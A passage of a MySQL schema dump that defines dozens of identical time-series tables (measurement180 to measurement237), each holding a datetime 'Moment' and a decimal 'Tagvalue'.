SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement180` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement181`
--
DROP TABLE IF EXISTS `measurement181`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement181` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement182`
--
DROP TABLE IF EXISTS `measurement182`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement182` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement183`
--
DROP TABLE IF EXISTS `measurement183`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement183` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement184`
--
DROP TABLE IF EXISTS `measurement184`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement184` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement185`
--
DROP TABLE IF EXISTS `measurement185`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement185` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement186`
--
DROP TABLE IF EXISTS `measurement186`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement186` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement187`
--
DROP TABLE IF EXISTS `measurement187`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement187` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement188`
--
DROP TABLE IF EXISTS `measurement188`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement188` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement189`
--
DROP TABLE IF EXISTS `measurement189`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement189` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement19`
--
DROP TABLE IF EXISTS `measurement19`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement19` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement190`
--
DROP TABLE IF EXISTS `measurement190`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement190` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement191`
--
DROP TABLE IF EXISTS `measurement191`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement191` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement192`
--
DROP TABLE IF EXISTS `measurement192`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement192` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement193`
--
DROP TABLE IF EXISTS `measurement193`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement193` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement194`
--
DROP TABLE IF EXISTS `measurement194`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement194` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement195`
--
DROP TABLE IF EXISTS `measurement195`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement195` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement196`
--
DROP TABLE IF EXISTS `measurement196`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement196` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement197`
--
DROP TABLE IF EXISTS `measurement197`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement197` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement198`
--
DROP TABLE IF EXISTS `measurement198`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement198` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement199`
--
DROP TABLE IF EXISTS `measurement199`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement199` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement2`
--
DROP TABLE IF EXISTS `measurement2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement2` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement20`
--
DROP TABLE IF EXISTS `measurement20`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement20` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement200`
--
DROP TABLE IF EXISTS `measurement200`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement200` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement201`
--
DROP TABLE IF EXISTS `measurement201`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement201` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement202`
--
DROP TABLE IF EXISTS `measurement202`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement202` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement203`
--
DROP TABLE IF EXISTS `measurement203`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement203` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement204`
--
DROP TABLE IF EXISTS `measurement204`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement204` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement205`
--
DROP TABLE IF EXISTS `measurement205`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement205` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement206`
--
DROP TABLE IF EXISTS `measurement206`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement206` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement207`
--
DROP TABLE IF EXISTS `measurement207`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement207` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement208`
--
DROP TABLE IF EXISTS `measurement208`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement208` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement209`
--
DROP TABLE IF EXISTS `measurement209`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement209` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement21`
--
DROP TABLE IF EXISTS `measurement21`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement21` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement210`
--
DROP TABLE IF EXISTS `measurement210`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement210` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement211`
--
DROP TABLE IF EXISTS `measurement211`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement211` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement212`
--
DROP TABLE IF EXISTS `measurement212`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement212` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement213`
--
DROP TABLE IF EXISTS `measurement213`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement213` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement214`
--
DROP TABLE IF EXISTS `measurement214`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement214` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement215`
--
DROP TABLE IF EXISTS `measurement215`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement215` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement216`
--
DROP TABLE IF EXISTS `measurement216`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement216` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement217`
--
DROP TABLE IF EXISTS `measurement217`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement217` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement218`
--
DROP TABLE IF EXISTS `measurement218`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement218` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement219`
--
DROP TABLE IF EXISTS `measurement219`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement219` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement22`
--
DROP TABLE IF EXISTS `measurement22`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement22` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement220`
--
DROP TABLE IF EXISTS `measurement220`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement220` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement221`
--
DROP TABLE IF EXISTS `measurement221`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement221` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement222`
--
DROP TABLE IF EXISTS `measurement222`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement222` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement223`
--
DROP TABLE IF EXISTS `measurement223`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement223` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement224`
--
DROP TABLE IF EXISTS `measurement224`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement224` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement225`
--
DROP TABLE IF EXISTS `measurement225`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement225` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement226`
--
DROP TABLE IF EXISTS `measurement226`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement226` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement227`
--
DROP TABLE IF EXISTS `measurement227`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement227` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement228`
--
DROP TABLE IF EXISTS `measurement228`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement228` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement229`
--
DROP TABLE IF EXISTS `measurement229`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement229` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement23`
--
DROP TABLE IF EXISTS `measurement23`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement23` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement230`
--
DROP TABLE IF EXISTS `measurement230`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement230` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement231`
--
DROP TABLE IF EXISTS `measurement231`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement231` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement232`
--
DROP TABLE IF EXISTS `measurement232`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement232` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement233`
--
DROP TABLE IF EXISTS `measurement233`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement233` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement234`
--
DROP TABLE IF EXISTS `measurement234`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement234` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement235`
--
DROP TABLE IF EXISTS `measurement235`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement235` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement236`
--
DROP TABLE IF EXISTS `measurement236`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement236` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement237`
--
DROP TABLE IF EXISTS `measurement237`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement237` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
